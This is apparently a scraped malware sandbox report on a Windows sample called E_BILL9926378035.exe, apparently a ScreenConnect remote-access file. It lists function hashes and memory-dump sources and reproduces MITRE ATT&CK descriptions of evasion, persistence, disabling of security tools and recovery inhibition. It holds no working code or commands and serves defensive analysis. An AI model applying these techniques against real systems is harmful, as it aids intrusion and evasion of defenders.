Opcode Fuzzy Hash: 2211fc8701b5304b751a0bf712cd75e00947e00fe35c2db51e93a2ff22801325
Instruction Fuzzy Hash: 5BE06571F0590D5FDB98EB9CD8655FCB7B1EF98240F4406B6D01DC31A5DE315A024740

Function 00007FFD9BBA3599 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891fd4df59c13d040df63ae1dd244c93ebefcf7291c61ef3bf8bcdf19c6f4081
Instruction ID: 8d3069fb3b412d9a3512863fd6ed974da1fa3f7fb27acaff4d63af2ef8e58a85
Opcode Fuzzy Hash: 891fd4df59c13d040df63ae1dd244c93ebefcf7291c61ef3bf8bcdf19c6f4081
Instruction Fuzzy Hash: 3FF09B3550D68C9FCF42EB78D0518D57FB0EE1631070501D7F049CB052E721CA55CB82

Function 00007FFD9B8A17F8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2183ce6c2f5e250ac03e324fb5416dcf1c00ea500f149ac7486b96eab6a692e4
Instruction ID: 7ff7a8145e48b546a5d3cc83a733b21d61d216a0f3f8f9f66d107c881a1229a0
Opcode Fuzzy Hash: 2183ce6c2f5e250ac03e324fb5416dcf1c00ea500f149ac7486b96eab6a692e4
Instruction Fuzzy Hash: F4E0483070990D8FDB94FB2CE454A64B3D2EF5931575405B5D40DC729ADE36EC82C740

Function 00007FFD9BBA0121 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e17ccabec50b6b8524ca0b048e57972200652a58d66a5f99e7c28064841f24
Instruction ID: fab24ed2b49f165ba231f51a27d04daa8876a1883d161ea09bcb274d5026954d
Opcode Fuzzy Hash: 84e17ccabec50b6b8524ca0b048e57972200652a58d66a5f99e7c28064841f24
Instruction Fuzzy Hash: A8E0922150E7D50FD752973484688E03FA0EE1322074900EFD4858F4B3E9148649C742

Function 00007FFD9B89C671 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8eeb69add6301b98c8e555842a2930b8e048b4f1809a6e346e0e4142e5d96ff
Instruction ID: 141fa28c939ae3ba32156d06d804573175a1e85b943916884c1cd4bdb0d87137
Opcode Fuzzy Hash: c8eeb69add6301b98c8e555842a2930b8e048b4f1809a6e346e0e4142e5d96ff
Instruction Fuzzy Hash: A0E09270D0F2894FDB228BB5CC289E53FF0AF5B21070A82FAD0488B0A7D61D66058B51

Function 00007FFD9BBAB13D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bc46e1b59d8a41e0f4d2e9f55ca8b3a2d593ed0fe87e247a2f9e7fb75dd98e
Instruction ID: 7756847589d942f3004f49d8634ff877b9f125344a6fec84ffa57b756e8b15e2
Opcode Fuzzy Hash: d7bc46e1b59d8a41e0f4d2e9f55ca8b3a2d593ed0fe87e247a2f9e7fb75dd98e
Instruction Fuzzy Hash: B1D01263F1EC1D0AF6F8969C74952F452C2E7D85A574902B3D41DC629ADD199D930280

Function 00007FFD9B8917D8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 793e867504979287afb2b5ff2e684098086c054b5df75fae9bebe5991d6f63cf
Instruction ID: 130e3eaae4d4e3294428a92a6f6bc7fa9a54adcf110873dea0258a306881be2a
Opcode Fuzzy Hash: 793e867504979287afb2b5ff2e684098086c054b5df75fae9bebe5991d6f63cf
Instruction Fuzzy Hash: 7DE02B21B1E42C2BEB74B3B968112FA75C4EF4C300F410176F40DC2286DC142E2402C0

Function 00007FFD9B897C81 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7876f5abf01bae31658c7064ddc71ee11fbce1abe66f7e4bdcb465854992c
Instruction ID: d3441df1c60a4af1b6c2f56f71b1c18ba741f9ee8e4fc3465d37120994a7174c
Opcode Fuzzy Hash: bfa7876f5abf01bae31658c7064ddc71ee11fbce1abe66f7e4bdcb465854992c
Instruction Fuzzy Hash: D0E02614B09C860AF74D636468316EA6642DF84300FA040B9E0BECB2CFED1D3D834282

Function 00007FFD9BBA3E20 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bbbfad96fe2833f3fee9c124b39a70ad13e3f4aed50aabd50878f70cd4a60d6
Instruction ID: c2327e6cea4a497e30d3685f187a0884e15adba0a41f7c227f9c8141b217676a
Opcode Fuzzy Hash: 6bbbfad96fe2833f3fee9c124b39a70ad13e3f4aed50aabd50878f70cd4a60d6
Instruction Fuzzy Hash: 0BE0C225F4E60B02FFBC22B568B53B9A0C1AF08308F4A407AE41DC00E9CD5C9E808162

Function 00007FFD9B898920 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5362e360225e3de0ede964a256954aad03cb5fc653c4321130d114874f90ca98
Instruction ID: 4f67deb6502423e17240211003f0080a482d87749d3f53a93b3b2436eb148d3d
Opcode Fuzzy Hash: 5362e360225e3de0ede964a256954aad03cb5fc653c4321130d114874f90ca98
Instruction Fuzzy Hash: D1E0C232F16D0E5ADF58DBA8A805AD87FA1EB99390F4142B2D80CC31A6EE34A5164701

Function 00007FFD9BBA9E03 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19aa69f0c4e2102fdcaf36fe31adb55d642d193a404fe99f42c220ed5813869
Instruction ID: 449a45e39d2ded712a673d5b00d075384bdfc83310f89ef6930b56c665d19994
Opcode Fuzzy Hash: e19aa69f0c4e2102fdcaf36fe31adb55d642d193a404fe99f42c220ed5813869
Instruction Fuzzy Hash: FBD0923571495D8FCF81EF8CE840ADA77A0FF99352B4204A1F51DC7225CB31E9258B40

Function 00007FFD9B89E9AB Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697204614a6773b8e92dd2a95e789ddf6d8c433a0b9b1c71df7e2deef80c1b53
Instruction ID: 8699d7de73a3dd550354e7162c3f3cce040c95dd1f4ba7112403ddb4946fd947
Opcode Fuzzy Hash: 697204614a6773b8e92dd2a95e789ddf6d8c433a0b9b1c71df7e2deef80c1b53
Instruction Fuzzy Hash: ACD0221370FACD0EFB6582D81C241107F92CAD90E132C02EBC458CA0B3D8090AC803A0

Function 00007FFD9B89BA88 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
Instruction ID: e509b7dc91b6975263d2b4be1b428e02532a83c07fd54cc35b5b693a20078165
Opcode Fuzzy Hash: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
Instruction Fuzzy Hash: F3D01220E1F10F4ADEB4EBA5DC592E43ED0A71D320FC65234F009C3198E66D51A48B41

Function 00007FFD9B89E991 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049438dfc7e95a770516baf794e37f5919036c5ba35892be77917f3f031571b7
Instruction ID: 6592ee2d2e4409739f32ce2879578a23e69974eb77e4ddeb82a4e8cd9efa080b
Opcode Fuzzy Hash: 049438dfc7e95a770516baf794e37f5919036c5ba35892be77917f3f031571b7
Instruction Fuzzy Hash: 56C08C02A0E9480AFFE056A906262640982DBAD342F818066A00CC11A3DC0858490300

Function 00007FFD9BBA21AA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff491dbad06e68e4d84012ed4df37fe772b4a2c9125f34af2cb77b84ede6d5cf
Instruction ID: 59ec8c1d3b9cd5d9f2b684408bd4d85826bd62e2b3816fffa1db5c7dee4320ca
Opcode Fuzzy Hash: ff491dbad06e68e4d84012ed4df37fe772b4a2c9125f34af2cb77b84ede6d5cf
Instruction Fuzzy Hash: 40B09260F0AE0E4AD6B59E89406423914D19F69201722823EC00EC26B2CD286A858281

Function 00007FFD9BBA246F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c51cc6a790cadf392d2218e9d1bf1c0d395aeab0169a7512a7be672b3a835e6b
Instruction ID: d663f03ad3d951550b4d1baabd53b23fbde80c881d5133a2e415e2ac21e1ed24
Opcode Fuzzy Hash: c51cc6a790cadf392d2218e9d1bf1c0d395aeab0169a7512a7be672b3a835e6b
Instruction Fuzzy Hash: DAC09210F1EA4F4AFAA5EBA884712BE25927F8D604B93C535E00D821E6CD3CB7029645

Non-executed Functions

Function 00007FFD9B895FFA Relevance: 5.1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

Strings

!;, xrefs: 00007FFD9B89607E
M_^, xrefs: 00007FFD9B896001
3, xrefs: 00007FFD9B896086
"C, xrefs: 00007FFD9B896076

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 3$!;$"C$M_^
API String ID: 0-2128356359
Opcode ID: 0600be93cfd9f2c5c7881d8c4ac3b3b666993ee7b914614e8cd253b5c3d7e673
Instruction ID: 3803fb419d7e34ff256b4b6cb9fd308ff34e30cf600326c4dd60cffd374da52f
Opcode Fuzzy Hash: 0600be93cfd9f2c5c7881d8c4ac3b3b666993ee7b914614e8cd253b5c3d7e673
Instruction Fuzzy Hash: FD112C87B2583E419604327DFC150F8B3C8DBEE13774543B3C249CB187AC46548781E1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E_BILL9926378035.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_E_BILL9926378035_2394ffaf9ddf91f81c1bd23bfb8afd7b4f4227a_1e075fbf_f9d8b530-db1c-45f7-be19-b443ecd401f7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA49C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C4.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA970.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA98E.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA5A.tmp.txt

Windows Analysis Report
E_BILL9926378035.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.This may deny access to available backups and recovery options.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Snapshot: Snapshot Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre